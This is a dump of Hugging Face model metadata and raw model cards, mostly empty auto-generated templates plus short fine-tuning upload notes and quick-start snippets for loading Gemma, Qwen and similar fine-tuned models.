### Dataset schema

| Column | Type | Min | Max |
|---|---|---|---|
| `modelId` | string | 5 chars | 139 chars |
| `author` | string | 2 chars | 42 chars |
| `last_modified` | timestamp[us, tz=UTC] | 2020-02-15 11:33:14 | 2025-08-02 00:43:11 |
| `downloads` | int64 | 0 | 223M |
| `likes` | int64 | 0 | 11.7k |
| `library_name` | string (548 classes) | | |
| `tags` | list | 1 item | 4.05k items |
| `pipeline_tag` | string (55 classes) | | |
| `createdAt` | timestamp[us, tz=UTC] | 2022-03-02 23:29:04 | 2025-08-02 00:35:11 |
| `card` | string | 11 chars | 1.01M chars |
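Each record below is one row of this dataset: the model's Hub metadata followed by its raw `card` markdown. As a minimal sketch of how rows with this schema are consumed (the repo id is a placeholder, since the dump does not name the dataset), the 🤗 `datasets` library can load them directly:

```python
# Minimal sketch: loading rows with the schema above.
# "username/models-metadata" is a placeholder repo id, not the real dataset.
from datasets import load_dataset

ds = load_dataset("username/models-metadata", split="train")

row = ds[0]
print(row["modelId"], row["downloads"], row["likes"])
print(row["tags"][:5])    # `tags` is a list column
print(row["card"][:200])  # `card` holds the raw README markdown
```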
### Rhulli/gemma-2b-it-finetuned
- **Author:** Rhulli · **Library:** peft · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:49:18Z
- **Tags:**
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:google/gemma-2b-it", "base_model:adapter:google/gemma-2b-it", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:47:08Z
- **Card:**
--- base_model: google/gemma-2b-it library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.11.1
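The card's "How to Get Started" section is left as [More Information Needed]. A minimal sketch, assuming only what the frontmatter states (a PEFT adapter on `google/gemma-2b-it`, PEFT 0.11.1), might look like:

```python
# Hedged sketch: load the base model named in the card's frontmatter,
# then attach this repo as a PEFT adapter. Generation settings are illustrative.
from transformers import AutoModelForCausalLM, AutoTokenizer
from peft import PeftModel

base = AutoModelForCausalLM.from_pretrained("google/gemma-2b-it")
model = PeftModel.from_pretrained(base, "Rhulli/gemma-2b-it-finetuned")
tokenizer = AutoTokenizer.from_pretrained("google/gemma-2b-it")

inputs = tokenizer("Hello, how are you?", return_tensors="pt")
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=32)[0]))
```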
### kcrl/Qwen2.5-3B-Instruct
- **Author:** kcrl · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:48:38Z
- **Tags:**
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen2", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T09:43:43Z
- **Card:**
--- base_model: unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** kcrl - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
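The card documents the training shortcut (Unsloth + TRL) but includes no inference snippet. A hedged sketch using a plain `transformers` text-generation pipeline, mirroring the quick-start pattern other cards in this dump use:

```python
# Hedged sketch: the card gives no usage example; a standard
# text-generation pipeline is one reasonable way to try the weights.
from transformers import pipeline

generator = pipeline("text-generation", model="kcrl/Qwen2.5-3B-Instruct")
out = generator([{"role": "user", "content": "Explain LoRA in one sentence."}],
                max_new_tokens=64, return_full_text=False)[0]
print(out["generated_text"])
```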
### volfenstein/LORA-simple-stories-generator
- **Author:** volfenstein · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:45:19Z
- **Tags:**
[ "transformers", "safetensors", "llama", "text-generation", "conversational", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** text-generation · **Created:** 2025-06-11T10:24:40Z
- **Card:**
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4
- **Author:** ibrahimbukhariLingua · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:44:20Z
- **Tags:**
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-3B-Instruct", "base_model:finetune:Qwen/Qwen2.5-3B-Instruct", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:44:08Z
- **Card:**
--- base_model: Qwen/Qwen2.5-3B-Instruct library_name: transformers model_name: qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-3B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance_reasoning_distilled-1000-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
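"This model was trained with SFT." is the card's entire description of the procedure. As a schematic of what such a TRL run looks like (the dataset and output directory are placeholders, not the author's settings):

```python
# Schematic TRL SFT run; placeholders marked. Matches the TRL 0.18-era API
# the card lists, not the author's actual script.
from datasets import load_dataset
from trl import SFTConfig, SFTTrainer

train = load_dataset("trl-lib/Capybara", split="train")  # placeholder dataset
trainer = SFTTrainer(
    model="Qwen/Qwen2.5-3B-Instruct",             # base model from the card
    args=SFTConfig(output_dir="qwen2.5-3b-sft"),  # placeholder output dir
    train_dataset=train,
)
trainer.train()
```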
### alejo03/proyectoIA-tokenizer-v3
- **Author:** alejo03 · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:32:56Z
- **Tags:**
[ "transformers", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:32:49Z
- **Card:**
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### alejo03/proyectoIA-modelo-v3
- **Author:** alejo03 · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:32:47Z
- **Tags:**
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:32:32Z
- **Card:**
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### MinaMila/llama_instbase_unlearned_ug2_e-6_1.0_0.5_0.25_0.25_ep2_LoRa_ACSEmployment_2_cfda_ep6_22
- **Author:** MinaMila · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:32:16Z
- **Tags:**
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:32:12Z
- **Card:**
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
### PathFinderKR/GPT2-small-2025-06-09_21-14-00
- **Author:** PathFinderKR · **Library:** none · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:31:21Z
- **Tags:**
[ "safetensors", "gpt2", "model_hub_mixin", "pytorch_model_hub_mixin", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-10T20:59:00Z
- **Card:**
--- tags: - model_hub_mixin - pytorch_model_hub_mixin --- This model has been pushed to the Hub using the [PytorchModelHubMixin](https://huggingface.co/docs/huggingface_hub/package_reference/mixins#huggingface_hub.PyTorchModelHubMixin) integration: - Code: [More Information Needed] - Paper: [More Information Needed] - Docs: [More Information Needed]
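The card only notes the PyTorchModelHubMixin integration. A hedged sketch of that pattern (the class below is illustrative; the repo's actual GPT-2-style architecture is not documented in the card):

```python
# Hedged sketch of the PyTorchModelHubMixin pattern the card mentions.
# TinyModel is illustrative; loading this exact repo requires the original class.
import torch.nn as nn
from huggingface_hub import PyTorchModelHubMixin

class TinyModel(nn.Module, PyTorchModelHubMixin):
    def __init__(self, hidden_size: int = 128):
        super().__init__()
        self.linear = nn.Linear(hidden_size, hidden_size)

    def forward(self, x):
        return self.linear(x)

# from_pretrained rebuilds the module from the pushed config + weights;
# shown for the pattern only, since the pushed class must match.
model = TinyModel.from_pretrained("PathFinderKR/GPT2-small-2025-06-09_21-14-00")
```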
### JYNGAA13/123
- **Author:** JYNGAA13 · **Library:** none · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:30:40Z
- **Tags:**
[ "license:bigscience-openrail-m", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:30:40Z
- **Card:**
--- license: bigscience-openrail-m ---
### phospho-app/vaileriy-ACT_BBOX-lerobot3-9pqta
- **Author:** phospho-app · **Library:** none · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:30:35Z
- **Tags:**
[ "safetensors", "phosphobot", "act", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T10:51:48Z
- **Card:**
--- tags: - phosphobot - act task_categories: - robotics --- # act Model - phospho Training Pipeline ## This model was trained using **phospho**. Training was successful; try it out on your robot! ## Training parameters: - **Dataset**: [phospho-app/lerobot3_bboxes](https://huggingface.co/datasets/phospho-app/lerobot3_bboxes) - **Wandb run URL**: None - **Epochs**: None - **Batch size**: 100 - **Training steps**: 10000 📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme) 🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
### SERGIO1945/my_lora_model
- **Author:** SERGIO1945 · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:30:18Z
- **Tags:**
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "qwen3", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:29:49Z
- **Card:**
--- base_model: unsloth/qwen3-14b-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen3 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** SERGIO1945 - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen3-14b-unsloth-bnb-4bit This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
### Triangle104/Homunculus-abliterated-Q6_K-GGUF
- **Author:** Triangle104 · **Library:** transformers · **Downloads:** 0 · **Likes:** 0 · **Last modified:** 2025-06-11T11:29:38Z
- **Tags:**
[ "transformers", "gguf", "distillation", "/think", "/nothink", "reasoning-transfer", "arcee-ai", "chat", "abliterated", "uncensored", "llama-cpp", "gguf-my-repo", "en", "base_model:huihui-ai/Homunculus-abliterated", "base_model:quantized:huihui-ai/Homunculus-abliterated", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
- **Pipeline tag:** none · **Created:** 2025-06-11T11:28:57Z
- **Card:**
